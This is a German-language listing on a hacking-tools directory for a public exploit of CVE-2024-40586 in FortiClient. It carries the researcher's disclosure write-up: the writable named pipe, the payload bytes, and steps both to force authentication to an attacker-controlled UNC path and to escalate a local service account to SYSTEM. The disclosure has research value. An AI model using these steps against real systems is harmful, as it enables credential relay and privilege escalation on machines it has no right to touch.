Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient — Exploit für CVE-2024-40586: zwingt Windows-Hosts zur Authentifizierung über eine anfällige FortiClient Named Pipe, was eine Privilegienausweitung auf SYSTEM oder laterale Bewegung durch Relay-Angriffe ermöglicht. | Kitploit
Tools/GitHubGitHub/hagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient
Privilege EscalationSchwachstellenanalyseExploitationLaterale BewegungPenetrationstestsAuthentifizierungRed Teaming
GitHubhagrid29/cve-2024-40586-windows-coerced-authentication-in-forticlient

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2024-40586-Windows-Coerced-Authentication-in-FortiClient

Exploit für CVE-2024-40586: zwingt Windows-Hosts zur Authentifizierung über eine anfällige FortiClient Named Pipe, was eine Privilegienausweitung auf SYSTEM oder laterale Bewegung durch Relay-Angriffe ermöglicht.

Repository anzeigen
14vor 1 JahrNoch nicht geprüft

CVE-2024-40586 Erzwungene Windows-Authentifizierung in FortiClient

Auf Windows-Systemen wurde festgestellt, dass FortiClient (App-Version 7.0.8.0427) einem entfernten, nicht privilegierten Benutzer erlaubt, Windows-Hosts zu zwingen, sich über eine benannte Pipe, die für den FortiSSLVPNdaemon-Dienst zuständig ist, gegenüber anderen Maschinen zu authentifizieren.

Es wurde beobachtet, dass die benannte Pipe "FortiSslvpnNamedPipe" Lese- und Schreibzugriff von jedem Benutzer erlaubt.

Fig1

Analyse

Die App liest das 5. Byte des Puffers aus der benannten Pipe als Opcode PipeBuffer+4

Fig2

Es wurde beobachtet, dass die App eine Datei liest, wenn der Opcode gleich 24 (d.h. 0x18) ist. Codeablauf: Case 24 => LABEL_26 => strncpy kopiert Payload in Variable Buffer => übergibt Payload an sub_7FF60C3EAC20 => Aufruf von CreateFileA => ReadFile Fig3

Fig4

Fig5

Allerdings unternimmt die Anwendung nichts mit dem Dateiinhalt.

Exploit

Wir können einen manipulierten Traffic (d.h. "\x00\x00\x00\x00\x18\x00" verkettet mit dem Zielpfad) an die anfällige benannte Pipe "FortiSslvpnNamedPipe" senden, um Opcode 24 auszulösen und den Prozess "FortiSSLVPNdaemon.exe" zu zwingen, CreateFileA mit SYSTEM-Berechtigungen aufzurufen. Dadurch können wir den Server zwingen, eine entfernte Datei über einen UNC-Pfad (z.B. "\\<remote ip>\<file path>") zu verbinden oder eine lokale benannte Pipe (z.B. "\\127.0.0.1\pipe\<named pipe>") zu verbinden.

Szenario 1

Um Windows-Hosts von einem entfernten, nicht authentifizierten Benutzer zur Authentifizierung gegenüber anderen Maschinen zu zwingen, kann der Benutzer die folgenden Schritte ausführen:

  1. Starten Sie auf dem Angreifer-Rechner einen Listener, um die erzwungene Authentifizierung zu empfangen.
  2. Senden Sie auf dem Angreifer-Rechner einen manipulierten Payload (d.h. "\x00\x00\x00\x00\x18\x00" + "\\<Attacker-IP>\fake\fake") an die anfällige benannte Pipe der Opfermaschine "\\<victim IP>\pipe\FortiSslvpnNamedPipe", um den Prozess zu zwingen, eine entfernte Datei mit dem UNC-Pfad "\\<Attacker-IP>\fake\fake" zu verbinden.
  3. Ähnlich wie bei anderen Angriffen zur erzwungenen Authentifizierung (z. B. SpoolSample) könnte der Angreifer einen Relay-Angriff oder einen Authentifizierungs-Downgrade-Angriff durchführen.

Fig6

Szenario 2

Um eine Privilegienausweitung auf SYSTEM von einem lokalen Benutzer mit "SeImpersonatePrivilege" (z.B. "nt authority\network service") durchzuführen, kann der Benutzer die folgenden Schritte ausführen:

  1. Erstellen Sie einen Named-Pipe-Server, der auf Verbindungen wartet.
  2. Senden Sie einen manipulierten Payload (d.h. "\x00\x00\x00\x00\x18\x00" + "\\127.0.0.1\pipe\<pipe server>\XXX") an die lokale anfällige benannte Pipe "\\.\pipe\FortiSslvpnNamedPipe", um den Prozess zu zwingen, eine Verbindung zu unserem Named-Pipe-Server herzustellen.
  3. Nachdem die Verbindung eingegangen ist, rufen Sie ImpersonateNamedPipeClient() auf, um SYSTEM-Berechtigungen zu erlangen.

Fig7

Zeitleiste

  • 07/09/2023 - Schwachstelle bei Fortinet gemeldet
  • 08/30/2023 - Fortinet bestätigte die Schwachstelle
  • 02/11/2024 - Veröffentlichung

Referenz

  • https://fortiguard.fortinet.com/psirt/FG-IR-23-279
Tool herunterladen